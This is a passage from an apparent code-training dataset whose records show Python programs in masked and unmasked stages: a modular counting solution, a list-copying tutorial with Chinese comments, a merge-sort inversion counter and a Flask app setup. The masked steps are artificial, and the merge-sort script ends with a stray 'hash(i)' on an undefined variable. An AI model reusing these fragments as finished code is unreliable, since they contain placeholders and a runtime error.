"step-1": "<mask token>\n\n\ndef run():\n mod = 1000000007\n N, *AB = map(int, read().split())\n A_B = []\n INF = float('inf')\n zerozero = 0\n for i in range(N):\n a = AB[2 * i]\n b = AB[2 * i + 1]\n if a == 0 and b == 0:\n zerozero += 1\n elif b == 0:\n A_B.append((INF, 0))\n elif a == 0:\n A_B.append((0, INF))\n else:\n tmp = math.gcd(a, b)\n if a / b > 0:\n v = 1\n else:\n v = -1\n A_B.append((abs(a // tmp), v * abs(b // tmp)))\n comb_dict = defaultdict(lambda : [0, 0])\n for ai, bi in A_B:\n if ai == INF:\n comb_dict[0][1] += 1\n elif bi == INF:\n comb_dict[0][0] += 1\n elif bi < 0:\n comb_dict[ai, bi][0] += 1\n else:\n comb_dict[bi, -ai][1] += 1\n ret = 1\n for _, val_list in comb_dict.items():\n a, b = val_list\n if a == 0 or b == 0:\n ret *= pow(2, max(a, b), mod)\n else:\n ret *= pow(2, a, mod) + pow(2, b, mod) - 1\n ret %= mod\n ret += zerozero - 1\n print(ret % mod)\n\n\n<mask token>\n",
"step-2": "<mask token>\nsys.setrecursionlimit(10 ** 7)\n<mask token>\n\n\ndef run():\n mod = 1000000007\n N, *AB = map(int, read().split())\n A_B = []\n INF = float('inf')\n zerozero = 0\n for i in range(N):\n a = AB[2 * i]\n b = AB[2 * i + 1]\n if a == 0 and b == 0:\n zerozero += 1\n elif b == 0:\n A_B.append((INF, 0))\n elif a == 0:\n A_B.append((0, INF))\n else:\n tmp = math.gcd(a, b)\n if a / b > 0:\n v = 1\n else:\n v = -1\n A_B.append((abs(a // tmp), v * abs(b // tmp)))\n comb_dict = defaultdict(lambda : [0, 0])\n for ai, bi in A_B:\n if ai == INF:\n comb_dict[0][1] += 1\n elif bi == INF:\n comb_dict[0][0] += 1\n elif bi < 0:\n comb_dict[ai, bi][0] += 1\n else:\n comb_dict[bi, -ai][1] += 1\n ret = 1\n for _, val_list in comb_dict.items():\n a, b = val_list\n if a == 0 or b == 0:\n ret *= pow(2, max(a, b), mod)\n else:\n ret *= pow(2, a, mod) + pow(2, b, mod) - 1\n ret %= mod\n ret += zerozero - 1\n print(ret % mod)\n\n\nif __name__ == '__main__':\n run()\n",
"step-3": "<mask token>\nsysread = sys.stdin.readline\nread = sys.stdin.read\n<mask token>\nsys.setrecursionlimit(10 ** 7)\n<mask token>\n\n\ndef run():\n mod = 1000000007\n N, *AB = map(int, read().split())\n A_B = []\n INF = float('inf')\n zerozero = 0\n for i in range(N):\n a = AB[2 * i]\n b = AB[2 * i + 1]\n if a == 0 and b == 0:\n zerozero += 1\n elif b == 0:\n A_B.append((INF, 0))\n elif a == 0:\n A_B.append((0, INF))\n else:\n tmp = math.gcd(a, b)\n if a / b > 0:\n v = 1\n else:\n v = -1\n A_B.append((abs(a // tmp), v * abs(b // tmp)))\n comb_dict = defaultdict(lambda : [0, 0])\n for ai, bi in A_B:\n if ai == INF:\n comb_dict[0][1] += 1\n elif bi == INF:\n comb_dict[0][0] += 1\n elif bi < 0:\n comb_dict[ai, bi][0] += 1\n else:\n comb_dict[bi, -ai][1] += 1\n ret = 1\n for _, val_list in comb_dict.items():\n a, b = val_list\n if a == 0 or b == 0:\n ret *= pow(2, max(a, b), mod)\n else:\n ret *= pow(2, a, mod) + pow(2, b, mod) - 1\n ret %= mod\n ret += zerozero - 1\n print(ret % mod)\n\n\nif __name__ == '__main__':\n run()\n",
"step-4": "import sys\nsysread = sys.stdin.readline\nread = sys.stdin.read\nfrom heapq import heappop, heappush\nfrom collections import defaultdict\nsys.setrecursionlimit(10 ** 7)\nimport math\n\n\ndef run():\n mod = 1000000007\n N, *AB = map(int, read().split())\n A_B = []\n INF = float('inf')\n zerozero = 0\n for i in range(N):\n a = AB[2 * i]\n b = AB[2 * i + 1]\n if a == 0 and b == 0:\n zerozero += 1\n elif b == 0:\n A_B.append((INF, 0))\n elif a == 0:\n A_B.append((0, INF))\n else:\n tmp = math.gcd(a, b)\n if a / b > 0:\n v = 1\n else:\n v = -1\n A_B.append((abs(a // tmp), v * abs(b // tmp)))\n comb_dict = defaultdict(lambda : [0, 0])\n for ai, bi in A_B:\n if ai == INF:\n comb_dict[0][1] += 1\n elif bi == INF:\n comb_dict[0][0] += 1\n elif bi < 0:\n comb_dict[ai, bi][0] += 1\n else:\n comb_dict[bi, -ai][1] += 1\n ret = 1\n for _, val_list in comb_dict.items():\n a, b = val_list\n if a == 0 or b == 0:\n ret *= pow(2, max(a, b), mod)\n else:\n ret *= pow(2, a, mod) + pow(2, b, mod) - 1\n ret %= mod\n ret += zerozero - 1\n print(ret % mod)\n\n\nif __name__ == '__main__':\n run()\n",
"step-5": "# coding: utf-8\nimport sys\n#from operator import itemgetter\nsysread = sys.stdin.readline\nread = sys.stdin.read\nfrom heapq import heappop, heappush\nfrom collections import defaultdict\nsys.setrecursionlimit(10**7)\nimport math\n#from itertools import product#accumulate, combinations, product\n#import bisect# lower_bound etc\n#import numpy as np\n#from copy import deepcopy\ndef run():\n mod = 1000000007\n N, *AB = map(int, read().split())\n A_B = []\n INF = float('inf')\n zerozero = 0\n for i in range(N):\n a = AB[2*i]\n b = AB[2*i+1]\n if a== 0 and b == 0:\n zerozero += 1\n elif b == 0:\n A_B.append((INF, 0))\n elif a == 0:\n A_B.append((0, INF))\n else:\n tmp = math.gcd(a,b)\n if a / b > 0 :v = 1\n else: v = -1\n A_B.append((abs(a//tmp), v * abs(b//tmp)))\n\n comb_dict = defaultdict(lambda:[0,0])\n\n for ai, bi in A_B:\n if ai == INF:\n comb_dict[0][1] += 1\n elif bi == INF:\n comb_dict[0][0] += 1\n elif bi < 0:\n comb_dict[(ai,bi)][0] += 1\n else:\n comb_dict[(bi, -ai)][1] += 1\n\n ret = 1\n for _, val_list in comb_dict.items():\n a,b = val_list\n if a == 0 or b == 0:\n ret *= pow(2, max(a,b), mod)\n else:\n ret *= pow(2, a, mod) + pow(2, b, mod) - 1\n ret %= mod\n ret += zerozero-1\n print(ret%mod)\n\n\n\nif __name__ == \"__main__\":\n run()",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print(name[0], name[2])
print(name[1:3])
print(name[:3])
print(name[0:3])
print(name[-2:])
name.append('666')
name.insert(1, '999')
print(name)
<|reserved_special_token_0|>
print(name)
name.pop()
print(name)
name.pop(2)
print(name)
print(name.index('999'))
name.reverse()
print(name)
name.sort()
print(name)
<|reserved_special_token_0|>
print(name2)
<|reserved_special_token_0|>
print(names)
<|reserved_special_token_0|>
print('name3:', names3)
<|reserved_special_token_0|>
print(names)
print(names1)
print(names2)
for i in names2:
print(i)
print(name[0:-1:2])
print(name[::2])
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
name = ['111', '222', '333', '444', '555']
print(name[0], name[2])
print(name[1:3])
print(name[:3])
print(name[0:3])
print(name[-2:])
name.append('666')
name.insert(1, '999')
print(name)
name[0] = '000'
print(name)
name.pop()
print(name)
name.pop(2)
print(name)
print(name.index('999'))
name.reverse()
print(name)
name.sort()
print(name)
name2 = name.copy()
print(name2)
name[1] = 'xxx'
names = ['1', [1, 2], '2']
names[1][0] = 9
print(names)
names1 = copy.copy(names)
names3 = name[:]
print('name3:', names3)
names2 = copy.deepcopy(names)
names[1][1] = 3
print(names)
print(names1)
print(names2)
for i in names2:
print(i)
print(name[0:-1:2])
print(name[::2])
<|reserved_special_token_0|>
<|reserved_special_token_1|>
import copy
name = ['111', '222', '333', '444', '555']
print(name[0], name[2])
print(name[1:3])
print(name[:3])
print(name[0:3])
print(name[-2:])
name.append('666')
name.insert(1, '999')
print(name)
name[0] = '000'
print(name)
name.pop()
print(name)
name.pop(2)
print(name)
print(name.index('999'))
name.reverse()
print(name)
name.sort()
print(name)
name2 = name.copy()
print(name2)
name[1] = 'xxx'
names = ['1', [1, 2], '2']
names[1][0] = 9
print(names)
names1 = copy.copy(names)
names3 = name[:]
print('name3:', names3)
names2 = copy.deepcopy(names)
names[1][1] = 3
print(names)
print(names1)
print(names2)
for i in names2:
print(i)
print(name[0:-1:2])
print(name[::2])
<|reserved_special_token_0|>
<|reserved_special_token_1|>
# Author: Charse
# py 列表的使用
import copy
name = ["111", "222", "333", "444", "555"]
# 从列表中取得元素
print(name[0], name[2]) # 111 333
print(name[1:3]) # 切片 ['222', '333']
print(name[:3]) # ['111', '222', '333'] 与下标从0开始是一样的
print(name[0:3]) # ['111', '222', '333']
print(name[-2:]) # ['444', '555'] 与name
# 往列表中添加元素
name.append("666") # 直接在末尾添加
name.insert(1, "999") # 在指定位置插入 : 将999插入到下标为1的位置, 原来位置中元素就直接往后顺延
print(name)
# 修改列表中元素
name[0] = "000"
print(name)
# 删除元素
name.pop() # 默认是删除最后一个下标
print(name)
name.pop(2)
print(name)
# 取出指定元素的下标
print(name.index("999"))
# 反转 改变的是分组里面的元素
name.reverse()
print(name)
# 特殊字符, 数字, 大写字母, 小写字母排序. 改变的是数组中的元素
name.sort()
print(name)
# name.clear() remove all items 删除所有的元素
# 复制列表
name2 = name.copy() # 这个是浅copy,如果列表中还有列表,列表的中元素修改了,新的中也同样是修改了
print(name2)
name[1] = "xxx" # name2中是不会进行修改的
names = ["1", [1, 2], "2"]
names[1][0] = 9
print(names)
names1 = copy.copy(names) # 这个是浅copy,与列表的copy是一样的.只是一个引用的copy
names3 = name[:]
print("name3:", names3)
# 进行深copy
names2 = copy.deepcopy(names)
# 对列表的元素进行修改,两者是同样的被修改
# names2 元素内的列表是不会被修改的
names[1][1] = 3
print(names)
print(names1)
print(names2)
# 遍历列表
for i in names2:
print(i)
# 跳跃打印: 从0 开始打印, 到末尾, 步长为2
print(name[0:-1:2])
# 0, -1可以进行省略
print(name[::2])
'''
深浅copy
'''
|
flexible
|
{
"blob_id": "d517c1e2eb4d37a2584f1603c704efce6834df92",
"index": 7443,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(name[0], name[2])\nprint(name[1:3])\nprint(name[:3])\nprint(name[0:3])\nprint(name[-2:])\nname.append('666')\nname.insert(1, '999')\nprint(name)\n<mask token>\nprint(name)\nname.pop()\nprint(name)\nname.pop(2)\nprint(name)\nprint(name.index('999'))\nname.reverse()\nprint(name)\nname.sort()\nprint(name)\n<mask token>\nprint(name2)\n<mask token>\nprint(names)\n<mask token>\nprint('name3:', names3)\n<mask token>\nprint(names)\nprint(names1)\nprint(names2)\nfor i in names2:\n print(i)\nprint(name[0:-1:2])\nprint(name[::2])\n<mask token>\n",
"step-3": "<mask token>\nname = ['111', '222', '333', '444', '555']\nprint(name[0], name[2])\nprint(name[1:3])\nprint(name[:3])\nprint(name[0:3])\nprint(name[-2:])\nname.append('666')\nname.insert(1, '999')\nprint(name)\nname[0] = '000'\nprint(name)\nname.pop()\nprint(name)\nname.pop(2)\nprint(name)\nprint(name.index('999'))\nname.reverse()\nprint(name)\nname.sort()\nprint(name)\nname2 = name.copy()\nprint(name2)\nname[1] = 'xxx'\nnames = ['1', [1, 2], '2']\nnames[1][0] = 9\nprint(names)\nnames1 = copy.copy(names)\nnames3 = name[:]\nprint('name3:', names3)\nnames2 = copy.deepcopy(names)\nnames[1][1] = 3\nprint(names)\nprint(names1)\nprint(names2)\nfor i in names2:\n print(i)\nprint(name[0:-1:2])\nprint(name[::2])\n<mask token>\n",
"step-4": "import copy\nname = ['111', '222', '333', '444', '555']\nprint(name[0], name[2])\nprint(name[1:3])\nprint(name[:3])\nprint(name[0:3])\nprint(name[-2:])\nname.append('666')\nname.insert(1, '999')\nprint(name)\nname[0] = '000'\nprint(name)\nname.pop()\nprint(name)\nname.pop(2)\nprint(name)\nprint(name.index('999'))\nname.reverse()\nprint(name)\nname.sort()\nprint(name)\nname2 = name.copy()\nprint(name2)\nname[1] = 'xxx'\nnames = ['1', [1, 2], '2']\nnames[1][0] = 9\nprint(names)\nnames1 = copy.copy(names)\nnames3 = name[:]\nprint('name3:', names3)\nnames2 = copy.deepcopy(names)\nnames[1][1] = 3\nprint(names)\nprint(names1)\nprint(names2)\nfor i in names2:\n print(i)\nprint(name[0:-1:2])\nprint(name[::2])\n<mask token>\n",
"step-5": "# Author: Charse\n# py 列表的使用\n\nimport copy\n\n\nname = [\"111\", \"222\", \"333\", \"444\", \"555\"]\n\n# 从列表中取得元素\nprint(name[0], name[2]) # 111 333\nprint(name[1:3]) # 切片 ['222', '333']\nprint(name[:3]) # ['111', '222', '333'] 与下标从0开始是一样的\nprint(name[0:3]) # ['111', '222', '333']\nprint(name[-2:]) # ['444', '555'] 与name\n\n# 往列表中添加元素\nname.append(\"666\") # 直接在末尾添加\nname.insert(1, \"999\") # 在指定位置插入 : 将999插入到下标为1的位置, 原来位置中元素就直接往后顺延\nprint(name)\n\n# 修改列表中元素\nname[0] = \"000\"\nprint(name)\n\n# 删除元素\nname.pop() # 默认是删除最后一个下标\nprint(name)\nname.pop(2)\nprint(name)\n\n# 取出指定元素的下标\nprint(name.index(\"999\"))\n\n# 反转 改变的是分组里面的元素\nname.reverse()\nprint(name)\n\n# 特殊字符, 数字, 大写字母, 小写字母排序. 改变的是数组中的元素\nname.sort()\nprint(name)\n\n# name.clear() remove all items 删除所有的元素\n\n# 复制列表\nname2 = name.copy() # 这个是浅copy,如果列表中还有列表,列表的中元素修改了,新的中也同样是修改了\nprint(name2)\nname[1] = \"xxx\" # name2中是不会进行修改的\n\nnames = [\"1\", [1, 2], \"2\"]\n\nnames[1][0] = 9\nprint(names)\n\nnames1 = copy.copy(names) # 这个是浅copy,与列表的copy是一样的.只是一个引用的copy\n\nnames3 = name[:]\n\nprint(\"name3:\", names3)\n\n\n# 进行深copy\nnames2 = copy.deepcopy(names)\n\n# 对列表的元素进行修改,两者是同样的被修改\n# names2 元素内的列表是不会被修改的\nnames[1][1] = 3\n\nprint(names)\nprint(names1)\nprint(names2)\n\n# 遍历列表\nfor i in names2:\n print(i)\n\n\n\n# 跳跃打印: 从0 开始打印, 到末尾, 步长为2\nprint(name[0:-1:2])\n# 0, -1可以进行省略\nprint(name[::2])\n\n\n'''\n深浅copy\n\n\n'''\n\n\n\n\n\n\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
count=0
def merge(a, b):
global count
c = []
h = j = 0
while j < len(a) and h < len(b):
if a[j] <= b[h]:
c.append(a[j])
j += 1
else:
count+=(len(a[j:]))
c.append(b[h])
h += 1
if j == len(a):
for i in b[h:]:
c.append(i)
else:
for i in a[j:]:
c.append(i)
# count += h+1
return c
def merge_sort(lists):
if len(lists) <= 1:
return lists
middle = len(lists)//2
left = merge_sort(lists[:middle])
right = merge_sort(lists[middle:])
return merge(left, right)
if __name__ == '__main__':
a = [7, 6, 5,9, 10, 11]
print(merge_sort(a))
print(count)
hash(i)
|
normal
|
{
"blob_id": "cf3b66a635c6549553af738f263b035217e75a7a",
"index": 903,
"step-1": "<mask token>\n\n\ndef merge_sort(lists):\n if len(lists) <= 1:\n return lists\n middle = len(lists) // 2\n left = merge_sort(lists[:middle])\n right = merge_sort(lists[middle:])\n return merge(left, right)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef merge(a, b):\n global count\n c = []\n h = j = 0\n while j < len(a) and h < len(b):\n if a[j] <= b[h]:\n c.append(a[j])\n j += 1\n else:\n count += len(a[j:])\n c.append(b[h])\n h += 1\n if j == len(a):\n for i in b[h:]:\n c.append(i)\n else:\n for i in a[j:]:\n c.append(i)\n return c\n\n\ndef merge_sort(lists):\n if len(lists) <= 1:\n return lists\n middle = len(lists) // 2\n left = merge_sort(lists[:middle])\n right = merge_sort(lists[middle:])\n return merge(left, right)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef merge(a, b):\n global count\n c = []\n h = j = 0\n while j < len(a) and h < len(b):\n if a[j] <= b[h]:\n c.append(a[j])\n j += 1\n else:\n count += len(a[j:])\n c.append(b[h])\n h += 1\n if j == len(a):\n for i in b[h:]:\n c.append(i)\n else:\n for i in a[j:]:\n c.append(i)\n return c\n\n\ndef merge_sort(lists):\n if len(lists) <= 1:\n return lists\n middle = len(lists) // 2\n left = merge_sort(lists[:middle])\n right = merge_sort(lists[middle:])\n return merge(left, right)\n\n\nif __name__ == '__main__':\n a = [7, 6, 5, 9, 10, 11]\n print(merge_sort(a))\n print(count)\n hash(i)\n",
"step-4": "count = 0\n\n\ndef merge(a, b):\n global count\n c = []\n h = j = 0\n while j < len(a) and h < len(b):\n if a[j] <= b[h]:\n c.append(a[j])\n j += 1\n else:\n count += len(a[j:])\n c.append(b[h])\n h += 1\n if j == len(a):\n for i in b[h:]:\n c.append(i)\n else:\n for i in a[j:]:\n c.append(i)\n return c\n\n\ndef merge_sort(lists):\n if len(lists) <= 1:\n return lists\n middle = len(lists) // 2\n left = merge_sort(lists[:middle])\n right = merge_sort(lists[middle:])\n return merge(left, right)\n\n\nif __name__ == '__main__':\n a = [7, 6, 5, 9, 10, 11]\n print(merge_sort(a))\n print(count)\n hash(i)\n",
"step-5": "count=0\ndef merge(a, b):\n global count\n c = []\n h = j = 0\n while j < len(a) and h < len(b):\n if a[j] <= b[h]:\n c.append(a[j])\n j += 1\n else:\n count+=(len(a[j:]))\n c.append(b[h])\n h += 1\n\n if j == len(a):\n for i in b[h:]:\n c.append(i)\n else:\n for i in a[j:]:\n c.append(i)\n # count += h+1\n\n return c\n\ndef merge_sort(lists):\n if len(lists) <= 1:\n return lists\n middle = len(lists)//2\n left = merge_sort(lists[:middle])\n right = merge_sort(lists[middle:])\n return merge(left, right)\n\n\nif __name__ == '__main__':\n a = [7, 6, 5,9, 10, 11]\n print(merge_sort(a))\n print(count)\n hash(i)",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
#!/usr/bin/env python
#coding=utf-8
"""
__init__.py
:license: BSD, see LICENSE for more details.
"""
import os
import logging
import sys
from logging.handlers import SMTPHandler, RotatingFileHandler
from flask import Flask, g, session, request, flash, redirect, jsonify, url_for
from flaskext.babel import Babel
from bg import helpers
from bg.extensions import db, mail, cache, photos, identity_changed, Identity
from bg.views import frontend,admin,post,account
from bg.models import Post
DEFAULT_MODULES = (
(frontend, ""),
(post, "/post"),
(account, "/account"),
(admin, "/admin"),)
DEFAULT_APP_NAME = 'bg'
def create_app(config=None, modules=None):
if modules is None:
modules = DEFAULT_MODULES
app = Flask(DEFAULT_APP_NAME)
#config
app.config.from_pyfile(config)
configure_extensions(app)
configure_logging(app)
configure_errorhandlers(app)
configure_before_handlers(app)
configure_template_filters(app)
configure_context_processors(app)
configure_signals(app)
babel = Babel(app)
# register module
configure_modules(app, modules)
return app
def on_identity_changed(app, identity):
g.identity = identity
session['identity'] = identity
def configure_signals(app):
identity_changed.connect(on_identity_changed, app)
def configure_errorhandlers(app):
@app.errorhandler(401)
def unauthorized(error):
#if request.is_xhr:
# return jsonfiy(error=_("Login required"))
flash(("Please login to see this page"), "error")
#return redirect(url_for("account.login", next=request.path))
return redirect(url_for("account.login"))
def configure_before_handlers(app):
@app.before_request
def authenticate():
try:
g.identity = session['identity']
except Exception:
g.identity = Identity(0,'Login')
def configure_extensions(app):
# configure extensions
db.init_app(app)
#db.app = app
#db.create_all()
mail.init_app(app)
cache.init_app(app)
#setup_themes(app)
def configure_context_processors(app):
@app.context_processor
def archives():
archives = set()
for dt in Post.query.from_self(Post.create_date).order_by().filter_by(author_id=g.identity.id):
item = (dt.create_date.year, dt.create_date.month)
archives.add(item)
if len(archives) > 5:
break
archives = sorted(list(archives))
return dict(archives=archives)
def configure_modules(app, modules):
for module, url_prefix in modules:
app.register_module(module, url_prefix=url_prefix)
def configure_template_filters(app):
@app.template_filter()
def timesince(value):
return helpers.timesince(value)
@app.template_filter()
def endtags(value):
return helpers.endtags(value)
@app.template_filter()
def gravatar(email,size):
return helpers.gravatar(email,size)
@app.template_filter()
def format_date(date,s='full'):
return helpers.format_date(date,s)
@app.template_filter()
def format_datetime(time,s='full'):
return helpers.format_datetime(time,s)
@app.template_filter()
def format_yearmonth(date):
return '%s-%s'%date
def configure_logging(app):
mail_handler = \
SMTPHandler(app.config['MAIL_SERVER'],
app.config['DEFAULT_MAIL_SENDER'],
app.config['ADMINS'],
'application error',
(
app.config['MAIL_USERNAME'],
app.config['MAIL_PASSWORD'],
))
mail_handler.setLevel(logging.ERROR)
app.logger.addHandler(mail_handler)
formatter = logging.Formatter(
'%(asctime)s %(levelname)s: %(message)s '
'[in %(pathname)s:%(lineno)d]')
debug_log = os.path.join(app.root_path,
app.config['DEBUG_LOG'])
debug_file_handler = \
RotatingFileHandler(debug_log,
maxBytes=100000,
backupCount=10)
debug_file_handler.setLevel(logging.DEBUG)
debug_file_handler.setFormatter(formatter)
app.logger.addHandler(debug_file_handler)
error_log = os.path.join(app.root_path,
app.config['ERROR_LOG'])
error_file_handler = \
RotatingFileHandler(error_log,
maxBytes=100000,
backupCount=10)
error_file_handler.setLevel(logging.ERROR)
error_file_handler.setFormatter(formatter)
app.logger.addHandler(error_file_handler)
|
normal
|
{
"blob_id": "ef124e8c15ef347efd709a5e3fb104c7fd1bccde",
"index": 2753,
"step-1": "<mask token>\n\n\ndef on_identity_changed(app, identity):\n g.identity = identity\n session['identity'] = identity\n\n\ndef configure_signals(app):\n identity_changed.connect(on_identity_changed, app)\n\n\n<mask token>\n\n\ndef configure_before_handlers(app):\n\n @app.before_request\n def authenticate():\n try:\n g.identity = session['identity']\n except Exception:\n g.identity = Identity(0, 'Login')\n\n\ndef configure_extensions(app):\n db.init_app(app)\n mail.init_app(app)\n cache.init_app(app)\n\n\ndef configure_context_processors(app):\n\n @app.context_processor\n def archives():\n archives = set()\n for dt in Post.query.from_self(Post.create_date).order_by().filter_by(\n author_id=g.identity.id):\n item = dt.create_date.year, dt.create_date.month\n archives.add(item)\n if len(archives) > 5:\n break\n archives = sorted(list(archives))\n return dict(archives=archives)\n\n\ndef configure_modules(app, modules):\n for module, url_prefix in modules:\n app.register_module(module, url_prefix=url_prefix)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef create_app(config=None, modules=None):\n if modules is None:\n modules = DEFAULT_MODULES\n app = Flask(DEFAULT_APP_NAME)\n app.config.from_pyfile(config)\n configure_extensions(app)\n configure_logging(app)\n configure_errorhandlers(app)\n configure_before_handlers(app)\n configure_template_filters(app)\n configure_context_processors(app)\n configure_signals(app)\n babel = Babel(app)\n configure_modules(app, modules)\n return app\n\n\ndef on_identity_changed(app, identity):\n g.identity = identity\n session['identity'] = identity\n\n\ndef configure_signals(app):\n identity_changed.connect(on_identity_changed, app)\n\n\ndef configure_errorhandlers(app):\n\n @app.errorhandler(401)\n def unauthorized(error):\n flash('Please login to see this page', 'error')\n return redirect(url_for('account.login'))\n\n\ndef configure_before_handlers(app):\n\n @app.before_request\n def authenticate():\n try:\n g.identity = session['identity']\n except Exception:\n g.identity = Identity(0, 'Login')\n\n\ndef configure_extensions(app):\n db.init_app(app)\n mail.init_app(app)\n cache.init_app(app)\n\n\ndef configure_context_processors(app):\n\n @app.context_processor\n def archives():\n archives = set()\n for dt in Post.query.from_self(Post.create_date).order_by().filter_by(\n author_id=g.identity.id):\n item = dt.create_date.year, dt.create_date.month\n archives.add(item)\n if len(archives) > 5:\n break\n archives = sorted(list(archives))\n return dict(archives=archives)\n\n\ndef configure_modules(app, modules):\n for module, url_prefix in modules:\n app.register_module(module, url_prefix=url_prefix)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef create_app(config=None, modules=None):\n if modules is None:\n modules = DEFAULT_MODULES\n app = Flask(DEFAULT_APP_NAME)\n app.config.from_pyfile(config)\n configure_extensions(app)\n configure_logging(app)\n configure_errorhandlers(app)\n configure_before_handlers(app)\n configure_template_filters(app)\n configure_context_processors(app)\n configure_signals(app)\n babel = Babel(app)\n configure_modules(app, modules)\n return app\n\n\ndef on_identity_changed(app, identity):\n g.identity = identity\n session['identity'] = identity\n\n\ndef configure_signals(app):\n identity_changed.connect(on_identity_changed, app)\n\n\ndef configure_errorhandlers(app):\n\n @app.errorhandler(401)\n def unauthorized(error):\n flash('Please login to see this page', 'error')\n return redirect(url_for('account.login'))\n\n\ndef configure_before_handlers(app):\n\n @app.before_request\n def authenticate():\n try:\n g.identity = session['identity']\n except Exception:\n g.identity = Identity(0, 'Login')\n\n\ndef configure_extensions(app):\n db.init_app(app)\n mail.init_app(app)\n cache.init_app(app)\n\n\ndef configure_context_processors(app):\n\n @app.context_processor\n def archives():\n archives = set()\n for dt in Post.query.from_self(Post.create_date).order_by().filter_by(\n author_id=g.identity.id):\n item = dt.create_date.year, dt.create_date.month\n archives.add(item)\n if len(archives) > 5:\n break\n archives = sorted(list(archives))\n return dict(archives=archives)\n\n\ndef configure_modules(app, modules):\n for module, url_prefix in modules:\n app.register_module(module, url_prefix=url_prefix)\n\n\ndef configure_template_filters(app):\n\n @app.template_filter()\n def timesince(value):\n return helpers.timesince(value)\n\n @app.template_filter()\n def endtags(value):\n return helpers.endtags(value)\n\n @app.template_filter()\n def gravatar(email, size):\n return helpers.gravatar(email, size)\n\n @app.template_filter()\n def format_date(date, s='full'):\n return helpers.format_date(date, s)\n\n @app.template_filter()\n def format_datetime(time, s='full'):\n return helpers.format_datetime(time, s)\n\n @app.template_filter()\n def format_yearmonth(date):\n return '%s-%s' % date\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef create_app(config=None, modules=None):\n if modules is None:\n modules = DEFAULT_MODULES\n app = Flask(DEFAULT_APP_NAME)\n app.config.from_pyfile(config)\n configure_extensions(app)\n configure_logging(app)\n configure_errorhandlers(app)\n configure_before_handlers(app)\n configure_template_filters(app)\n configure_context_processors(app)\n configure_signals(app)\n babel = Babel(app)\n configure_modules(app, modules)\n return app\n\n\ndef on_identity_changed(app, identity):\n g.identity = identity\n session['identity'] = identity\n\n\ndef configure_signals(app):\n identity_changed.connect(on_identity_changed, app)\n\n\ndef configure_errorhandlers(app):\n\n @app.errorhandler(401)\n def unauthorized(error):\n flash('Please login to see this page', 'error')\n return redirect(url_for('account.login'))\n\n\ndef configure_before_handlers(app):\n\n @app.before_request\n def authenticate():\n try:\n g.identity = session['identity']\n except Exception:\n g.identity = Identity(0, 'Login')\n\n\ndef configure_extensions(app):\n db.init_app(app)\n mail.init_app(app)\n cache.init_app(app)\n\n\ndef configure_context_processors(app):\n\n @app.context_processor\n def archives():\n archives = set()\n for dt in Post.query.from_self(Post.create_date).order_by().filter_by(\n author_id=g.identity.id):\n item = dt.create_date.year, dt.create_date.month\n archives.add(item)\n if len(archives) > 5:\n break\n archives = sorted(list(archives))\n return dict(archives=archives)\n\n\ndef configure_modules(app, modules):\n for module, url_prefix in modules:\n app.register_module(module, url_prefix=url_prefix)\n\n\ndef configure_template_filters(app):\n\n @app.template_filter()\n def timesince(value):\n return helpers.timesince(value)\n\n @app.template_filter()\n def endtags(value):\n return helpers.endtags(value)\n\n @app.template_filter()\n def gravatar(email, size):\n return helpers.gravatar(email, size)\n\n @app.template_filter()\n def format_date(date, s='full'):\n return helpers.format_date(date, s)\n\n @app.template_filter()\n def format_datetime(time, s='full'):\n return helpers.format_datetime(time, s)\n\n @app.template_filter()\n def format_yearmonth(date):\n return '%s-%s' % date\n\n\ndef configure_logging(app):\n mail_handler = SMTPHandler(app.config['MAIL_SERVER'], app.config[\n 'DEFAULT_MAIL_SENDER'], app.config['ADMINS'], 'application error',\n (app.config['MAIL_USERNAME'], app.config['MAIL_PASSWORD']))\n mail_handler.setLevel(logging.ERROR)\n app.logger.addHandler(mail_handler)\n formatter = logging.Formatter(\n '%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]')\n debug_log = os.path.join(app.root_path, app.config['DEBUG_LOG'])\n debug_file_handler = RotatingFileHandler(debug_log, maxBytes=100000,\n backupCount=10)\n debug_file_handler.setLevel(logging.DEBUG)\n debug_file_handler.setFormatter(formatter)\n app.logger.addHandler(debug_file_handler)\n error_log = os.path.join(app.root_path, app.config['ERROR_LOG'])\n error_file_handler = RotatingFileHandler(error_log, maxBytes=100000,\n backupCount=10)\n error_file_handler.setLevel(logging.ERROR)\n error_file_handler.setFormatter(formatter)\n app.logger.addHandler(error_file_handler)\n",
"step-5": "#!/usr/bin/env python\n#coding=utf-8\n\n\"\"\"\n __init__.py\n\n :license: BSD, see LICENSE for more details.\n\"\"\"\n\nimport os\nimport logging\nimport sys\n\nfrom logging.handlers import SMTPHandler, RotatingFileHandler\nfrom flask import Flask, g, session, request, flash, redirect, jsonify, url_for\nfrom flaskext.babel import Babel\n\nfrom bg import helpers\nfrom bg.extensions import db, mail, cache, photos, identity_changed, Identity\n\nfrom bg.views import frontend,admin,post,account\nfrom bg.models import Post\n\nDEFAULT_MODULES = (\n (frontend, \"\"),\n (post, \"/post\"),\n (account, \"/account\"),\n (admin, \"/admin\"),)\n\nDEFAULT_APP_NAME = 'bg'\n\ndef create_app(config=None, modules=None):\n\n if modules is None:\n modules = DEFAULT_MODULES\n\n app = Flask(DEFAULT_APP_NAME)\n\n #config\n app.config.from_pyfile(config)\n configure_extensions(app)\n\n configure_logging(app)\n configure_errorhandlers(app)\n configure_before_handlers(app)\n configure_template_filters(app)\n configure_context_processors(app)\n configure_signals(app)\n babel = Babel(app)\n\n # register module\n configure_modules(app, modules)\n\n return app\n\ndef on_identity_changed(app, identity):\n g.identity = identity\n session['identity'] = identity\n\ndef configure_signals(app):\n identity_changed.connect(on_identity_changed, app)\n\ndef configure_errorhandlers(app):\n\n @app.errorhandler(401)\n def unauthorized(error):\n #if request.is_xhr:\n # return jsonfiy(error=_(\"Login required\"))\n flash((\"Please login 